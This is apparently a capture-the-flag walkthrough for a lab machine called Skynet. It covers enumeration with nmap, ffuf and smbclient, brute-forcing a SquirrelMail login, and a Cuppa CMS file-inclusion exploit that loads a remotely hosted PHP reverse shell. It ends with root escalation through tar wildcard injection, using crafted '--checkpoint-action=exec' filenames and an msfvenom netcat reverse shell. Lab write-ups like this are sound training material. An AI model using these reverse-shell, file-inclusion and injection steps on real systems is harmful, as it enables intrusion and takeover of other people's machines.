Skynet

5 minute read

img

General Enumeration and Initial Findings (Nmap, FFuF, SMBClient)

Starting off, as always, with a basic nmap scan

nmap -sC -sV -oN initial -T4 10.10.11.92

Nmap scan report for 10.10.11.92
Host is up (0.21s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP SASL UIDL CAPA PIPELINING AUTH-RESP-CODE RESP-CODES
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imap
|_imap-capabilities: SASL-IR more post-login have IDLE listed capabilities LITERAL+ ENABLE OK ID Pre-login LOGINDISABLEDA0001 IMAP4rev1 LOGIN-REFERRALS
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m01s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2021-06-06T08:26:40-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-06T13:26:40
|_  start_date: N/A

A few interesting ports.

80 - Webserver

139 and 445 - SMB.

Let’s kick around the webserver

img

Search engine that does… nothing? Nothing in the source, no robots.txt. Let’s see if we can bust some directories with FFuF using the Seclists Common list matching all response codes and filtering 404s

ffuf -u http://10.10.219.151/FUZZ -w /common.txt -mc all -fc 404

.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10]
.hta                    [Status: 403, Size: 276, Words: 20, Lines: 10]
admin                   [Status: 301, Size: 310, Words: 20, Lines: 10]
config                  [Status: 301, Size: 311, Words: 20, Lines: 10]
css                     [Status: 301, Size: 308, Words: 20, Lines: 10]
index.html              [Status: 200, Size: 523, Words: 26, Lines: 19]
js                      [Status: 301, Size: 307, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 276, Words: 20, Lines: 10]
squirrelmail            [Status: 301, Size: 317, Words: 20, Lines: 10]

/admin and /config are Forbidden but how about /squirrelmail?

img

Login page. Let’s do some more enumeration before trying to crack this.

Since 139 and 445 are open, we’ll take a look at some SMB enumeration using smbclient

smbclient -L \\\\10.10.219.151\\

img

Two interesting shares. anonymous and milesdyson

smbclient \\\\10.10.219.151\\anonymous

img

Grab attention.txt with get attention.txt

A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

logs is a directory with three files, only 1 has data

img

Grab log1.txt with get log1.txt

cyborg007haloterminator
terminator22596
terminator219
.
.
79terminator6
1996terminator

Passwords maybe? Let’s go back to /squirrelmail and see if any of these work for. We saw that there was a milesdyson share, so maybe that’s a username? Let’s use FFuF again, but this time to brute this login form.

Capture the login request in burp to build the command.

img

ffuf -u http://10.10.219.151/squirrelmail/src/redirect.php -d "login_username=milesdyson&secretkey=FUZZ&js_autodetect_results=1&just_logged_in=1" -H "Content-type: application/x-www-form-urlencoded" -w log1.txt
cyborg007haloterminator [Status: 302, Size: 0, Words: 1, Lines: 1]

Got a 302 redirect, which means this is likely our password. Log in!

img

Interesting

img

SMB password?! Maybe we can access the milesdyson share now!

img

cd notes ls

img

Grab important.txt with get important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

New endpoint! /45kra24zxs28v3yd


Access (Cuppa CMS, Remote File Inclusion, FFuF)

img

Running FFuF using Seclists Common list matching all response codes and filtering 404s

.htaccess               [Status: 403, Size: 276, Words: 20, Lines: 10]
.htpasswd               [Status: 403, Size: 276, Words: 20, Lines: 10]
.hta                    [Status: 403, Size: 276, Words: 20, Lines: 10]
administrator           [Status: 301, Size: 335, Words: 20, Lines: 10]
index.html              [Status: 200, Size: 418, Words: 45, Lines: 16]

/administrator

Cuppa cms

img

Looks like there’s a LFI/RFI exploit for Cuppa CMS

http://10.10.11.92/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php

Using the PoC to make sure it’s vulnerable. Decoded:

<?php 
	class Configuration{
		public $host = "localhost";
		public $db = "cuppa";
		public $user = "root";
		public $password = "password123";
		public $table_prefix = "cu_";
		public $administrator_template = "default";
		public $list_limit = 25;
		public $token = "OBqIPqlFWf3X";
		public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
		public $upload_default_path = "media/uploadsFiles";
		public $maximum_file_size = "5242880";
		public $secure_login = 0;
		public $secure_login_value = "";
		public $secure_login_redirect = "";
	} 

So we have LFI, let’s try RFI

Using php-reverse-shell.php from pentestmonkey.

  1. Edit the relevant values (IP and PORT)
  2. Host it on a webserver - python3 -m http.server
  3. Start a listener - nc -lvnp 4444
  4. Include your URL - alerts/alertConfigField.php?urlConfig=http://IP:PORT/php-reverse-shell.php
  5. Send it!

img


Privesc (tar checkpoints, Wildcard Injection, msfvenom)

Password reuse! Using cyborg007haloterminator we can switch to the milesdyson user.

There’s an interesting script in /home/milesdyson/backups called backup.sh

milesdyson@skynet:~/backups$ cat backup.sh

#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

Let’s check if it’s running as a cronjob

cat /etc/crontab

# m h dom mon dow user	command
*/1 *	* * *   root	/home/milesdyson/backups/backup.sh
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

So every minute it’s running the script, which means it’s changing to the /var/www/html directory and running tar cf on everything. milesdyson doesn’t have write access to /var/www/html, but if we drop back down to www-data we do!

Since tar is using a wildcard it’s vulnerable to injection by creating files with names that represent tar checkpoints:

--checkpoint=1
--checkpoint-action=exec=sh shell.sh

Create a reverse shell using msfvenom and start a listener

msfvenom -p cmd/unix/reverse_netcat lhost=IP lport=PORT R 

nc -lvnp PORT
echo 'SHELLOUTPUT' > shell.sh
touch -- "--checkpoint-action=exec=sh shell.sh"
touch -- --checkpoint=1

Notice the inclusion of -- before the file name, this allows us to create filenames with special characters.

Now we wait…

img